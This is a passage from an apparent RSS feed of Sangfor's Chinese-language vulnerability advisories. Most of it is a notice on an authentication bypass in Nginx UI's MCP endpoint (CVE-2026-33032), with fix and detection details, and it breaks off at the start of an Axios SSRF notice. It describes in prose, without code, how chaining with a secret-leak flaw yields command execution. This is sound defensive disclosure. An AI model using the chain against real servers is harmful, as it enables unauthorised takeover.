style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Nginx UI</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">影响范围：</span></strong></span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Nginx UI ≤ 2.3.5</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">漏洞类型：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">绕过认证</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">利用条件：</span></strong></span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">1、用户认证：不需要用户认证</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2、前置条件：默认配置</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">3、触发方式：远程</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">综合评价：</span></span></strong></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">&lt;综合评定利用难度&gt;：中等，需要配合其他漏洞才能执行代码。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">&lt;综合评定威胁等级&gt;：高危，能导致服务器失陷。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">官方解决方案：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">已发布</span></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">漏洞分析</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041699" src="https://wechat2rss.xlab.app/img-proxy/?k=b467f7df&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FAPc6NwjLsxSBibicDreS1Y6UUf5MDBxhHvGJEO27Xdgfzb9fR1fUcF4JOFjbCgRAgtWZUE5BvOxPSABfHL1QyXhkZmX4mUI8rXLThNuneKPoc%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">组件介绍</span></b></p></div></div></div></div><div style="margin: 25px 0%;box-sizing: border-box;"><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);padding: 0px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Nginx UI 是一款开源的、基于 Web 的图形化管理工具，旨在通过直观的界面彻底简化 Nginx 服务器的配置与管理 。它采用 Go 和 Vue 构建，将原本需要通过命令行进行的复杂操作，如管理虚拟主机、配置反向代理、实时监控服务器状态（CPU、内存等）以及在线查看日志，都迁移到了浏览器中完成。</span></p></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041700" src="https://wechat2rss.xlab.app/img-proxy/?k=275fbb58&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FAPc6NwjLsxSibNCXDP0cIuC336cH2H23LA5PRmtFKnHvIc5Zlu0rnpYo92iaqwXdicl0epLMMzSjianz83xgYeQUqo5k9ZAvFlR4bDRaibcwK3eQ%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">漏洞简介</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2026年4月16日，深瞳漏洞实验室监测到一则Nginx UI组件存在绕过认证漏洞的信息，漏洞编号：CVE-2026-33032，漏洞威胁等级：高危。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Nginx UI 的 /mcp_message 接口存在鉴权缺陷，仅做了白名单检验（且默认配置白名单为空），</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">未授权的攻击者可以利用脆弱接口建立 MCP 会话。配合 CVE-2026-27944 获取 node_secret 可以执行任意命令。注意：该漏洞已发现在野利用。</span></span></strong></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">影响范围</span></strong></p></div></div></div></div><div style="margin: 25px 0%;box-sizing: border-box;"><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">目前受影响的Nginx UI版本：</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Nginx UI ≤ 2.3.5</span></p></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">解决方案</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041698" src="https://wechat2rss.xlab.app/img-proxy/?k=54152ead&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FAPc6NwjLsxSvqFgibMwZ6sp6UjlTjktPjDmOmfAVxSfgFJeTA52MNVV5M8x7dwkMU0KYrp795kKgDxE2J10F2D2SPaQawT8ibpR1usxR2aZaY%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">官方修复建议</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">官方已发布最新版本修复该漏洞，建议受影响用户将 Nginx UI 更新到 2.3.6 版本。</span><span leaf=""><br/></span><span leaf="">下载链接：<a href="https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.6" target="_blank">https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.6</a></span></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041702" src="https://wechat2rss.xlab.app/img-proxy/?k=09188303&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxQpjR2XDbv4j7RhIPcE7l6L9nAicvZp0ZGKYvTK9wMAeHOxCkA7tqp1jLcljbwdsfCrVuUVeUXBVMI55Yfh9Wl9beJOzArARarU%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">临时修复建议</span></span></strong></p></div></div></div></div><p style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">关闭未使用的功能模块，减少潜在攻击入口。</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">遵循最小权限原则，严控各类敏感操作权限范围。</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">非必要不暴露服务到公网，限制访问源为可信范围。</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">定期更新系统及各类组件至安全版本，及时修补已知隐患。</span></p></li></ul></p><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041703" src="https://wechat2rss.xlab.app/img-proxy/?k=05569e5e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxT0CGdSVicSfM47NG5AwhPIVmGG4ook2QSxBbzB9EEZMfFAGd2nKzKQEpCxEy8cOktAq3rp5aFzic8cfAFVVukQYjpFQ5eqFMpP0%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">深信服解决方案</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">1、漏洞安全监测</span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">支持对Nginx UI MCP接口绕过认证漏洞(CVE-2026-33032)的监测，</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">可依据流量收集实时监控业务场景中的受影响资产情况，</span></span></strong><span leaf="">快速检查受影响范围，相关产品及服务如下：</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服安全感知管理平台SIP】</span></span></strong><span leaf="">预计2026年04月24日发布监测方案，规则ID:11228014。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服安全托管服务MSS】</span></span></strong><span leaf="">预计2026年04月24日发布监测方案（需要具备SIP组件能力），规则ID:11228014。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服可拓展检测响应平台XDR】</span></span></strong><span leaf="">预计2026年04月24日发布监测方案，规则ID:11228014。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">2、漏洞安全防护</span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">支持对Nginx UI MCP接口绕过认证漏洞(CVE-2026-33032)的防御，</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">可阻断攻击者针对该事件的入侵行为，</span></span></strong><span leaf="">相关产品及服务如下：</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服下一代防火墙AF】</span></span></strong><span leaf="">预计2026年04月24日发布防护方案，规则ID:11228014。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服Web应用防火墙WAF】</span></span></strong><span leaf="">预计2026年04月24日发布防护方案，规则ID:11228014。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服安全托管服务MSS】</span></span></strong><span leaf="">预计2026年04月24日发布防护方案（需要具备AF组件能力），规则ID:11228014。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服可拓展检测响应平台XDR】</span></span></strong><span leaf="">预计2026年04月24日发布防护方案（需要具备AF组件能力），规则ID:11228014。</span></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">参考链接</span></b></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/advisories/GHSA-h6c2-x2m2-mwhf" target="_blank">https://github.com/advisories/GHSA-h6c2-x2m2-mwhf</a></span></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;font-size: 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">时间轴</span></b></p></div></div></div></div><div style="text-align: left;justify-content: flex-start;margin: 10px 0%;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="padding: 0px 6px;text-align: center;color: rgb(56, 52, 52);letter-spacing: 1px;line-height: 1;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">2026/04/16</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;box-shadow: rgb(102, 188, 41) 0px 0px 0px;border-left: 2px dotted rgb(102, 188, 41);border-bottom-left-radius: 0px;flex: 100 100 0%;align-self: flex-start;height: auto;margin: 0px 6px 0px 12px;padding: 9px 16px 20px 24px;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(102, 102, 102);text-align: justify;letter-spacing: 1px;line-height: 1.6;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">深瞳漏洞实验室监测到Nginx UI MCP接口绕过认证漏洞信息。</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;margin: 10px 0%;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="padding: 0px 6px;text-align: center;color: rgb(56, 52, 52);letter-spacing: 1px;line-height: 1;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">2026/04/17</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;box-shadow: rgb(102, 188, 41) 0px 0px 0px;border-left: 2px dotted rgb(102, 188, 41);border-bottom-left-radius: 0px;flex: 100 100 0%;align-self: flex-start;height: auto;margin: 0px 6px 0px 12px;padding: 9px 16px 20px 24px;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(102, 102, 102);text-align: justify;letter-spacing: 1px;line-height: 1.6;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">深瞳漏洞实验室发布漏洞通告。</span></p></div></div></div><div style="text-align: unset;font-size: 15px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">点击</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">阅读原文</span></span></strong><span leaf="">，及时关注并登录深信服</span><strong style="box-sizing: border-box;"><span leaf="">智安全平台</span></strong><span leaf="">，可轻松查询漏洞相关解决方案。</span></p></div><div style="text-align: unset;font-size: 15px;box-sizing: border-box;"><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.4787037037037037" data-s="300,640" data-type="png" data-w="1080" type="block" data-imgfileid="100041707" src="https://wechat2rss.xlab.app/img-proxy/?k=0f2b7044&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FAPc6NwjLsxQnxubclqLouTxOiaZycoxicxjg28jJI3AgooVw18Cc6iatWo7ORAuYk8Iqpwyh04X13KWmPeGXicfmoRTFbq9PviarDXzAp5CBibdYQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.4" data-s="300,640" data-type="jpeg" data-w="1280" type="block" data-imgfileid="100039351" src="https://wechat2rss.xlab.app/img-proxy/?k=ca59cfa2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2Fw8NHw6tcQ5zvcIHbwGGYKbqDVYsVKzNNia1jYtHf49C7133AlDXAgex2W4lFvpia56tjQQDkiauNBrl08YbxqG01A%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2026_13775%5cx26amp;lang=ZH-CN">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=30e075c2&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg2NjgzNjA5NQ%3D%3D%26mid%3D2247525356%26idx%3D1%26sn%3D937dcf233c3dd1df9a2d77f81c9a211b">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 17 Apr 2026 16:37:00 +0800</pubDate>
    </item>
    <item>
      <title>【漏洞通告】Axios SSRF漏洞 (CVE-2026-40175)</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&amp;mid=2247525339&amp;idx=1&amp;sn=aaab6e4838ba21ae6ebb1cfa6018c207</link>
      <description>2026年4月14日，深瞳漏洞实验室监测到一则Axios组件存在服务器端伪造请求（SSRF）漏洞的信息，漏洞编号：CVE-2026-40175，漏洞威胁等级：严重。</description>
      <content:encoded><![CDATA[<p><span>深瞳漏洞实验室</span> <span>2026-04-15 19:40</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=654e7c0e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FAPc6NwjLsxQvOL1icfbyknia8sPp8YBrFVFpcsQQpIAWCZQPau6bicgoFDJCibk5gV5Ts05f9YWLPvH7jThEian6SJMV3wtnI2QrlumYVia7PTzNE%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>2026年4月14日，深瞳漏洞实验室监测到一则Axios组件存在服务器端伪造请求（SSRF）漏洞的信息，漏洞编号：CVE-2026-40175，漏洞威胁等级：严重。</p>
